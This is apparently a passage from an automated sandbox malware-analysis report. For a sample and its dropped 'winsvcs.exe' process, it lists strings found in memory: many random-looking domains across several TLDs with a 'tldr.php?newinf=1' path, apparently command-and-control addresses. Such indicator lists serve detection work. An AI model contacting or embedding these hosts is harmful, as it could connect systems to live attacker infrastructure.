        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eoroooskfogihisrg.ru/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eoroooskfogihisrg.ru/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://eoroooskfogihisrg.su/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eoroooskfogihisrg.su/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://fifiehsueuufidhfi.biz/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fifiehsueuufidhfi.biz/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fifiehsueuufidhfi.biz/tldr.php?newinf=1.m
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fifiehsueuufidhfi.biz/tldr.php?newinf=11m
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fifiehsueuufidhfi.biz/tldr.php?newinf=18m
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fifiehsueuufidhfi.biz/tldr.php?newinf=1Yk
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fifiehsueuufidhfi.biz/tldr.php?newinf=1sn
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://fifiehsueuufidhfi.com/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fifiehsueuufidhfi.com/tldr.php?ne
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fifiehsueuufidhfi.com/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fifiehsueuufidhfi.com/tldr.php?newinf=1k
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://fifiehsueuufidhfi.in/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fifiehsueuufidhfi.in/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://fifiehsueuufidhfi.info/
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://fifiehsueuufidhfi.net/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fifiehsueuufidhfi.net/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fifiehsueuufidhfi.net/tldr.php?newinf=1P
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://fifiehsueuufidhfi.ru/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fifiehsueuufidhfi.ru/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://fifiehsueuufidhfi.su/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fifiehsueuufidhfi.su/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fifiehsueuufidhfi.su/tldr.php?newinf=1xh
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://fiiauediehduefuge.biz/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiiauediehduefuge.biz/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiiauediehduefuge.biz/tldr.php?newinf=1&
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiiauediehduefuge.biz/tldr.php?newinf=13
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://fiiauediehduefuge.com/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiiauediehduefuge.com/tldr.php?newinf=1
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002CC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiiauediehduefuge.com/tldr.php?newinf=1Ck%
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiiauediehduefuge.com/u
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://fiiauediehduefuge.in/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiiauediehduefuge.in/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.00000000007C0000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://fiiauediehduefuge.info/
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://fiiauediehduefuge.net/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiiauediehduefuge.net/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000694000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607599559.000000000071C000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079B000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://fiiauediehduefuge.ru/
        Source: winsvcs.exe, 00000006.00000002.4807446517.0000000002C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiiauediehduefuge.ru/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.0000000000767000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873792922.000000000079F000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 0000000E.00000002.2873454713.0000000000405000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: http://fiiauediehduefuge.su/
        Source: winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fiiauediehduefuge.su/tldr.php?newinf=1
        Source: LisectAVT_2403002B_290.exe, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007DA000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2428805496.0000000000405000.00000002.00000001.01000000.00000003.sdmp, LisectAVT_2403002B_290.exe, 00000000.00000002.2429146913.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, winsvcs.exe, 00000006.00000002.4802598212.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000661000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4802598212.0000000000698000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000006.00000002.4800854286.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000720000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 00000009.00000002.2607303562.0000000000405000.00000002.00000001.01000000.0000000A.sdmp, winsvcs.exe, 00000009.00000002.2607599559.0000000000742000.00000004.00000020.00020000.00000000.sdmp, winsvcs.exe, 